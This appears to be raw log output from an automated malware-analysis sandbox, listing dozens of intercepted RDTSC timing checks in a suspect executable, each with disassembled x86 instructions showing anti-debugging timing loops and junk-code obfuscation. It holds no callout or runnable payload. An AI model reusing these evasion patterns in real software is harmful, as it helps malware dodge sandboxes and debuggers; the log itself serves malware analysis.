Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255A8F second address: 255A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255A93 second address: 255A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255C7B second address: 255C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255C81 second address: 255CE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b js 00007F84B0B050DAh 0x00000011 mov bx, 4EA1h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F84B0B050D8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 or bl, FFFFFFD4h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 adc bx, B0B8h 0x00000045 mov eax, dword ptr [ebp+122D0AD1h] 0x0000004b mov dword ptr [ebp+122D1D36h], edx 0x00000051 push FFFFFFFFh 0x00000053 add edi, 2F20A0F0h 0x00000059 movzx edi, di 0x0000005c nop 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255CE5 second address: 255CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255CE9 second address: 255D06 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F84B0B050D8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F84B0B050D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255D06 second address: 255D15 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25D967 second address: 25D99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007F84B0B050D6h 0x0000000b jmp 00007F84B0B050E9h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0B050DAh 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 262211 second address: 262215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 262215 second address: 262227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jo 00007F84B0B050D6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 262227 second address: 26224D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F84B0D65602h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnp 00007F84B0D65604h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26224D second address: 262251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 262484 second address: 26248A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26248A second address: 2624C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jne 00007F84B0B050E0h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push ecx 0x00000017 jmp 00007F84B0B050E2h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2624C7 second address: 2624CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2682A6 second address: 2682BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050DEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2675B4 second address: 2675F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F84B0D65604h 0x0000000b popad 0x0000000c jp 00007F84B0D655F8h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F84B0D655FAh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jg 00007F84B0D655F8h 0x00000023 push eax 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267CA8 second address: 267CE8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050F7h 0x00000008 jns 00007F84B0B050DCh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F84B0B050D6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267CE8 second address: 267CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267CEC second address: 267D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F84B0B050DCh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F84B0B050D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267D0C second address: 267D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267D10 second address: 267D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267E2C second address: 267E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267E32 second address: 267E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267FA8 second address: 267FC8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F84B0D655FAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0D65600h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C4B4 second address: 26C4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C4BD second address: 26C4C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C4C5 second address: 26C4F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F84B0B050D6h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007F84B0B050E6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pop eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C4F5 second address: 26C4FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C4FB second address: 26C4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F0FBB second address: 1F0FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 272122 second address: 272134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F84B0B050DEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 270C03 second address: 270C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 270EA5 second address: 270EF2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84B0B050D6h 0x00000008 jmp 00007F84B0B050E2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007F84B0B050E8h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F84B0B050E5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 270EF2 second address: 270F13 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F84B0D655F6h 0x00000008 jmp 00007F84B0D655FDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F84B0D655F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 270F13 second address: 270F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 271240 second address: 27124A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2714D7 second address: 2714E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F84B0B050D8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2714E8 second address: 2714F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F84B0D655F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2714F2 second address: 271511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27183D second address: 271842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 271842 second address: 271848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2719D3 second address: 2719F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F84B0D655FEh 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F84B0D655F6h 0x00000014 push edx 0x00000015 jno 00007F84B0D655F6h 0x0000001b pop edx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2719F6 second address: 271A0D instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F84B0B050DDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 271A0D second address: 271A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 271A21 second address: 271A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 271FA5 second address: 271FAA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2707D5 second address: 2707D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2707D9 second address: 2707E9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F84B0D655F6h 0x00000008 je 00007F84B0D655F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20003F second address: 200048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 200048 second address: 200051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 200051 second address: 200066 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F84B0B050DCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 200066 second address: 20006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20006C second address: 200082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 200082 second address: 20008B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A9EF second address: 27A9F9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A9F9 second address: 27AA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0D65607h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27AA16 second address: 27AA1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27AA1A second address: 27AA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D65601h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1EF4A8 second address: 1EF4BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1EF4BA second address: 1EF4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F84B0D655F6h 0x0000000a popad 0x0000000b jng 00007F84B0D65607h 0x00000011 jmp 00007F84B0D65601h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1EF4DC second address: 1EF4E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 279D7A second address: 279D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 279D7E second address: 279D92 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007F84B0B050D6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2794BB second address: 2794BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A295 second address: 27A2A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A412 second address: 27A41A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A41A second address: 27A41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27E0CE second address: 27E102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D65605h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F84B0D65606h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 242BA5 second address: 242BC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050E9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 242BC3 second address: 242C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F84B0D655F8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 and ecx, 10BB7481h 0x0000002a lea eax, dword ptr [ebp+124978A5h] 0x00000030 sub cx, FAA5h 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F84B0D65609h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 242DF0 second address: 242E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F84B0B050DCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24317F second address: 243183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2432A9 second address: 2432AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2432AD second address: 2432DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jmp 00007F84B0D65609h 0x0000000d push C3929B54h 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F84B0D655FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2432DD second address: 2432E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2432E1 second address: 2432EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F84B0D655F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2433D0 second address: 2433D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243500 second address: 243505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243505 second address: 24350B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24350B second address: 24351A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24351A second address: 243524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243524 second address: 243553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jp 00007F84B0D65608h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jnc 00007F84B0D655F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243553 second address: 243558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243558 second address: 24355D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243D89 second address: 243E38 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F84B0B050DCh 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 js 00007F84B0B050DCh 0x00000019 jmp 00007F84B0B050E7h 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F84B0B050D8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a mov dword ptr [ebp+122DB765h], edx 0x00000040 lea eax, dword ptr [ebp+124978E9h] 0x00000046 push 00000000h 0x00000048 push ebp 0x00000049 call 00007F84B0B050D8h 0x0000004e pop ebp 0x0000004f mov dword ptr [esp+04h], ebp 0x00000053 add dword ptr [esp+04h], 00000014h 0x0000005b inc ebp 0x0000005c push ebp 0x0000005d ret 0x0000005e pop ebp 0x0000005f ret 0x00000060 pushad 0x00000061 adc cx, EFDAh 0x00000066 sub dword ptr [ebp+1248BBA5h], eax 0x0000006c popad 0x0000006d nop 0x0000006e push ebx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F84B0B050E5h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243E38 second address: 243E6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F84B0D65609h 0x00000013 pop eax 0x00000014 rdtsc
